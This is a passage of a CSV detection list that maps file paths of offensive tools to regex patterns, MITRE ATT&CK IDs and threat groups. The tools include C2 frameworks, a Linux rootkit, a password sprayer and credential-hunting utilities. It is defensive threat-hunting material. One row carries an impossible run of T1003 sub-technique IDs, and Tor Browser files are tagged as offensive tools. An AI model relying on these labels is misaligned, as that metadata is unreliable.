Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/tor-0.*.tar.gz*",".{0,1000}\/tor\-0\..{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Tor2web-*.tar.gz*",".{0,1000}\/Tor2web\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/Tor2web-*.zip*",".{0,1000}\/Tor2web\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/tor2web.conf*",".{0,1000}\/tor2web\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/Tor2web.git*",".{0,1000}\/Tor2web\.git.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/tor2web.js*",".{0,1000}\/tor2web\.js.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/tor-archive-keyring*",".{0,1000}\/tor\-archive\-keyring.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/ToRat.git*",".{0,1000}\/ToRat\.git.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/torbrowser-install-*.exe *",".{0,1000}\/torbrowser\-install\-.{0,1000}\.exe\s\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/tor-browser-linux*.*",".{0,1000}\/tor\-browser\-linux.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/tor-browser-osx64*.*",".{0,1000}\/tor\-browser\-osx64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/tor-browser-win32*.*",".{0,1000}\/tor\-browser\-win32.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/tor-browser-win64*.*",".{0,1000}\/tor\-browser\-win64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/tor-consensus-checker.nse*",".{0,1000}\/tor\-consensus\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tor-gencert.exe*",".{0,1000}\/tor\-gencert\.exe.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/tor-geoipdb.list*",".{0,1000}\/tor\-geoipdb\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/tor-package-archive/*",".{0,1000}\/tor\-package\-archive\/.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/torsocks.conf",".{0,1000}\/torsocks\.conf","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/torsocks.list*",".{0,1000}\/torsocks\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/tor-static-windows-amd64.zip*",".{0,1000}\/tor\-static\-windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/toteslegit.ps1*",".{0,1000}\/toteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/traceroute-geolocation.nse*",".{0,1000}\/traceroute\-geolocation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tracers_fuzzer.cc*",".{0,1000}\/tracers_fuzzer\.cc.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/trackerjacker*",".{0,1000}\/trackerjacker.{0,1000}","offensive_tool_keyword","trackerjacker","Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.","T1040 - T1018 - T1591","TA0007 - - TA0043","N/A","N/A","Information Gathering","https://github.com/calebmadrigal/trackerjacker","1","0","N/A","N/A","10","2572","189","2024-01-16T05:10:22Z","2016-12-18T22:01:13Z" "*/Trackflaw/CVE*.py*",".{0,1000}\/Trackflaw\/CVE.{0,1000}\.py.{0,1000}","offensive_tool_keyword","poc","Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tools","https://github.com/Trackflaw/CVE-2023-23397","1","1","N/A","N/A","2","115","25","2023-03-24T10:46:38Z","2023-03-20T16:31:54Z" "*/transports/scramblesuit/*.py*",".{0,1000}\/transports\/scramblesuit\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/trap_command.py*",".{0,1000}\/trap_command\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/TreeWalker.cs*",".{0,1000}\/TreeWalker\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/TREVORspray.git*",".{0,1000}\/TREVORspray\.git.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*/trevorspray.log*",".{0,1000}\/trevorspray\.log.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*/trganda/CVE-2022-23131*",".{0,1000}\/trganda\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" "*/trick_ryuk.profile*",".{0,1000}\/trick_ryuk\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/trickbot.profile*",".{0,1000}\/trickbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/tricky.lnk.git*",".{0,1000}\/tricky\.lnk\.git.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*/tricky.ps1*",".{0,1000}\/tricky\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*/tricky.vbs*",".{0,1000}\/tricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*/tricky2.ps1*",".{0,1000}\/tricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*/tried_logins.txt*",".{0,1000}\/tried_logins\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*/TriggerLinux/*",".{0,1000}\/TriggerLinux\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/TripleCross.git*",".{0,1000}\/TripleCross\.git.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/TripleCross/apps/*",".{0,1000}\/TripleCross\/apps\/.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/TripleCross-0.1.0.zip*",".{0,1000}\/TripleCross\-0\.1\.0\.zip.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/TripleCross-0.1.0/*",".{0,1000}\/TripleCross\-0\.1\.0\/.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/trollsploit/*",".{0,1000}\/trollsploit\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/TROUBLE-1/Vajra*",".{0,1000}\/TROUBLE\-1\/Vajra.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/TruffleSnout.exe*",".{0,1000}\/TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/trusted_sec_bofs/*",".{0,1000}\/trusted_sec_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/trusted_sec_remote_bofs/*",".{0,1000}\/trusted_sec_remote_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/trustedsec/*",".{0,1000}\/trustedsec\/.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting various exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/trustedsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tso-brute.nse*",".{0,1000}\/tso\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tso-enum.nse*",".{0,1000}\/tso\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tunnel.nosocket.php*",".{0,1000}\/tunnel\.nosocket\.php.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data 